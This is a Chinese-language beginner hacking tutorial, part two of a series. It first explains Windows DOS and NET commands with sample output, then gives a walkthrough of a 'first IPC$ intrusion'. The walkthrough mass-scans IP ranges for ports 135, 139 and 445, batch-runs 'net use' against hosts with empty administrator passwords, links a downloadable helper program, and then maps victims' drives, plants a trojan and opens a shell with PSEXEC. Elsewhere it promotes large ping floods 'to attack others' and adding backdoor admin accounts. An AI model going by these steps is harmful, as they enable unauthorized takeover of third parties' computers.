黑客技术从0开始（二）

 

示例:

C:\>copy abc.txt c:\aaa.txt

已复制 1 个文件。

C:\>

[6]mkdir

作用:创造文件夹

用法:mkdir 文件夹名

[N]

还有很多,相关的教程很多,我也不在此多费口舌了.

四.DOS网络命令

[1]netstat -na

作用:查看网络连接和监听端口

用法:netstat -na(推荐)

示例:('后的是笔者+的注释)

C:\documents and Settings\Administrator>netstat -na

Active Connections

Proto Local Address Foreign Address State

TCP 0.0.0.0:80 0.0.0.0:0 LISTENING '在TCP80(HTTP)端口监听

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING '在TCP135端口监听

TCP 0.0.0.0:443 0.0.0.0:0 LISTENING '在TCP443端口监听

TCP 0.0.0.0:1031 0.0.0.0:0 LISTENING '在TCP1031端口监听

TCP 0.0.0.0:1070 0.0.0.0:0 LISTENING '在TCP1070端口监听

TCP 0.0.0.0:1146 0.0.0.0:0 LISTENING '在TCP1146端口监听

TCP 0.0.0.0:5780 0.0.0.0:0 LISTENING '在TCP5780端口监听

TCP 2*9.233.98.243:139 0.0.0.0:0 LISTENING '在TCP139(NET BIOS)端口监听

TCP 219.233.98.243:1146 202.102.232.145:80 ESTABLISHED

'已连接202.102.232.145的80端口

UDP 0.0.0.0:3456 *:*

UDP 0.0.0.0:4000 *:*

UDP 0.0.0.0:6000 *:*

UDP 127.0.0.1:1034 *:*

UDP 127.0.0.1:1145 *:*

UDP 2*9.233.98.243:137 *:*

UDP 2*9.233.98.243:138 *:*

UDP 2*9.233.98.243:500 *:*

备注:我们可以用NETSTAT命令来查看是否有人在试图入侵或有没有后门.后门会打开一个端口监听.

[2]ping

作用:发送ICMP数据包并等待对方返回,查看对方是否在线

用法:ping IPaddress , ping IPaddress -t -l 65500(用来攻击对方)

示例:

C:\documents and Settings\Administrator>ping 127.0.0.1

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Reply from 127.0.0.1: bytes=32 time<10ms TTL=128

Ping statistics for 127.0.0.1:

Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

C:\documents and Settings\Administrator>ping 127.0.0.1 -t -l 65500

Pinging 127.0.0.1 with 65500 bytes of data:

Reply from 127.0.0.1: bytes=65500 time<10ms TTL=128

Reply from 127.0.0.1: bytes=65500 time<10ms TTL=128

Reply from 127.0.0.1: bytes=65500 time<10ms TTL=128

................................

............................

Reply from 127.0.0.1: bytes=65500 time<10ms TTL=128

Reply from 127.0.0.1: bytes=65500 time<10ms TTL=128

Reply from 127.0.0.1: bytes=65500 time<10ms TTL=128

Ping statistics for 127.0.0.1:

Packets: Sent = N, Received = N, Lost = 0 (0% loss),

Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Control-C

^C

C:\documents and Settings\Administrator>

备注:当对方开防火墙时,就无法PING到对方

[3]ipconfig

作用:查看自己的网络设置

命令:ipconfig

示例:

C:\documents and Settings\Administrator>ipconfig

Windows 2000 IP Configuration

Ethernet adapter 本地连接:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 219.233.98.243

Subnet Mask . . . . . . . . . . . : 255.255.255.0

Default Gateway . . . . . . . . . : 219.233.98.1

[4]NET

作用:大部分的网络命令都在里头

命令:NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |

HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |

SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]

这里的命令太多了,很多都用不到,我只找主要的讲.这些命令都很重要,大家要学好!

{1}net use

作用:使用139端口建立远程共享连接

命令:

net use \\IP\共享名 "PASS" /user:USER (建立共享)

net use 本地盘符 \\IP\共享名 (映射共享)

net use (查看连接)

net use 共享名 /del (断开连接)

示例:

C:\documents and Settings\Administrator>net use \\218.242.256.60\c$ "" /user:administrator

命令成功完成。

C:\documents and Settings\Administrator>net use

会记录新的网络连接。

状态 本地 远程 网络

-------------------------------------------------------------------------------

OK \\218.242.256.60\c$ Microsoft Windows 网络

命令成功完成。

C:\documents and Settings\Administrator>net use z: \\218.242.256.60\c$

命令成功完成。

C:\documents and Settings\Administrator>net use z: /del

z: 已经删除。

C:\documents and Settings\Administrator>

备注:可以用net use * /del 来删除所有的连接

{2}net time

作用:取得对方的时间

命令: net time \\IP

示例:

C:\documents and Settings\Administrator>net time \\218.242.256.60

\\218.242.256.60 的当前时间是 2004/1/19 上午 10:29

命令成功完成。

{3}net share

作用:管理或查看本地的共享资源

命令:

net share (查看共享资源)

net share 共享名=共享路径 (增加共享)

net share 共享名 /del (删除共享资源)

示例:

C:\documents and Settings\Administrator>net share

共享名 资源 注释

-----------------------------------------------------------------

c$ c:\ 默认共享ipc$ 远程 IPC

命令成功完成。

C:\documents and Settings\Administrator>net share c$ /del

c$ 已经删除。

C:\documents and Settings\Administrator>net share c$=c:

c$ 共享成功。

备注:WIN2000默认共享了C$,D$,ADMIN$,IPC$,所以如果对方的密码为空,又有共享,它就死定了!!

{4}net view

作用:查看远程机器的共享资源

命令:net view \\IP

示例:

C:\documents and Settings\Administrator>net view \\218.242.182.60

清单是空的。

备注:要在建立IPC$连接后才能查看共享

{5}net start\stop

作用:开启或停止服务

命令:

net start (查看已开启的服务)

net start 服务名 (开启服务)

net stop 服务名 (停止服务)

示例:

C:\documents and Settings\Administrator>net start

已经启动以下 Windows 2000 服务:

Automatic Updates

COM+ Event System

Computer Browser

DHCP Client

Distributed File System

Distributed Link Tracking Client

DNS Client

Event Log

IIS Admin Service

IPSEC Policy Agent

License Logging Service

Logical Disk Manager

Machine Debug Manager

Network Connections

Plug and Play

Print Spooler

Protected Storage

Remote Procedure Call (RPC)

Remote Registry Service

Removable Storage

Rising Process Communication Center

Rising Realtime Monitor Service

RunAs Service

Security Accounts Manager

Server

Still Image Service

System Event Notification

TCP/IP NetBIOS Helper Service

Telephony

Windows Management Instrumentation

Windows Management Instrumentation Driver Extensions

WMDM PMSP Service

Workstation

命令成功完成。

C:\documents and Settings\Administrator>net start telnet

Telnet 服务正在启动 .

Telnet 服务已经启动成功。

C:\documents and Settings\Administrator>net stop telnet

Telnet 服务正在停止.

Telnet 服务已成功停止。

备注:启动的服务要是已安装过的

{6}net user

作用:管理用户

命令:

net user (查看用户列表)

net user 用户名 (查看用户资料)

net user 用户名 "密码" (更改用户密码)

net user 用户名 "密码" /add (增加用户)

net user 用户名 /del (删除用户)

示例:

C:\documents and Settings\Administrator>net user

\\SOMEONE 的用户帐户

-------------------------------------------------------------------------------

Administrator Guest IUSR_SOMEONE

IWAM_SOMEONE

命令成功完成。

C:\documents and Settings\Administrator>net user administrator

用户名 Administrator

全名

注释 管理计算机(域)的内置帐户

用户的注释

国家(地区)代码 000 (系统默认值)

帐户启用 Yes

帐户到期 永不

上次设置密码 2002/8/18 下午 08:42

密码到期 永不

密码可更改 2002/8/18 下午 08:42

需要密码 Yes

用户可以更改密码 Yes

允许的工作站 All

登录脚本

用户配置文件

主目录

上次登录 2004/1/19 上午 10:07

可允许的登录小时数 All

本地组会员 *Administrators *Debugger Users

全局组成员 *None

命令成功完成。

C:\documents and Settings\Administrator>net user administrator "02334"

命令成功完成。

C:\documents and Settings\Administrator>net user wudi "1234" /add

命令成功完成。

C:\documents and Settings\Administrator>net user wudi /del

命令成功完成。

备注:修改用户要有权限,例如GUEST不能改ADMINISTRATOR的密码.而ADMINISTRATOR可以改所有人的密码!

{7}net localgroup

作用:管理/查看用户组(权限!!)

命令:

net localgroup

net localgroup 组名

net localgroup 用户名 /add

net localgroup 用户名 /del

示例;

C:\documents and Settings\Administrator>net localgroup

\\SOMEONE 的别名

-------------------------------------------------------------------------------

*Administrators *Backup Operators *Debugger Users

*Guests *Power Users *Replicator

*Users *VS Developers

命令成功完成。

C:\documents and Settings\Administrator>net localgroup administrators

别名 administrators

注释管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------

Administrator

命令成功完成。

C:\documents and Settings\Administrator>net localgroup administrators wudi /add

命令成功完成。

C:\documents and Settings\Administrator>net localgroup administrators wudi /del

命令成功完成。

备注:在得到SHELL+过用户后千万要记得+权限,就是+到ADMINISTRATORS组里!!

{8}net send

作用:网开启了MESSENGER服务的机器(2000默认开启)上发送信息,也就是可恶的"信使服务",可用NET STOP MESSENGER来停止,并到控制面板->管理工具->"服务"里将其禁用.

命令:net send IP 内容

备注:本人曾经用其来聊天

小结:差不多就是这些拉,现在你已经有足够的知识了,可以开始学HACK了!!

X黑前准备X

[1]首先,你要有一台能跑的电脑(这不是废话吗),

[2]是要有操作系统(最好是一个WINDOWS 2000 SERVER,一个LINUX,没LINUX也可以,2000PRO也可以,不过2000SERVER可以给自己练习,强烈推荐SERVER)

[3]有网络,最好是宽带,不是的话要有快的肉鸡才行.

[3]安装一个防火墙,推荐天网2.5.1

[4]注册一个QQ,有邮箱,注册一个空间(注册地址www.websamba.com,支持FTP,WWW)

[5]别急,把前面的文章再看一便(别K我)

六.第一次IPC$入侵

如果你能坚持看到这里,我真的很佩服你.不过,基础是最重要的,不能心急,如果有可能的话,我建议

你在学HACK的同时学两门语言,一门是英语(很多软件和HELP文挡都是ENGLISH写的,很多术语也是英

语),一门是VB,它比较适合我们初学者.

我又说太多拉,理论不如实践,我们继续吧!

这次入侵是基于139端口(NETBIOS协议),它要求被攻击的对象开启139和445端口的2000以上版本的

WINDOWS.虽然,9X系统开启了139端口,但是我们入侵不了它.

首先,我们打开SUPERSCAN.着是一个非常快的扫描器,但是它的功能比较简单,只能PING和扫描端口

.我很喜欢这个工具,因为它快.它能大大提高你的效率.

在START一栏写一个扫描起始的IP,(例如218.242.161.1)在STOP一栏写一个扫描终止的IP,(例如

218.242.181.1),选择"Allports from"一栏,填135,135(2000以上版本都默认开

135,139,445),然后开始扫描!!

在扫描期间我们可以做任何事情!!听歌也好,灌水也好,只要不要啥等!!!否则人会变呆的..

不过别一时忘了时间等它扫到500台(OPEN PORTS的值)左右后我们把一些没用的机器去除(按

PRUNE)后将它保存(SAVE)为文本然后我们将其中的" |___ 135 DCE endpoint resolution"用替

换的方法去除把其中的"* + "用替换方法替换为"net use \\"然后再把替换后的文件带到一个小程

序里处理

下载地址http://www.websamba.com/port139/ipc.exe

下载地址http://www.websamba.com/port139/ipc.exe

这是我自己用VB编的

最后在把处理后的东西一批一批复制后打开一个CMD窗口,点击右键,执行

等待入侵结束....

如果找的不是C$的肉鸡而只是IPC$的空口令,那会找到很多没用的肉鸡,因为XP里面的IPC的权限很

低使用NET USE命令查看入侵进展用NET USE 命令影射他的硬盘然后值入你的木马

使用PSEXEC.EXE程序打开SHELL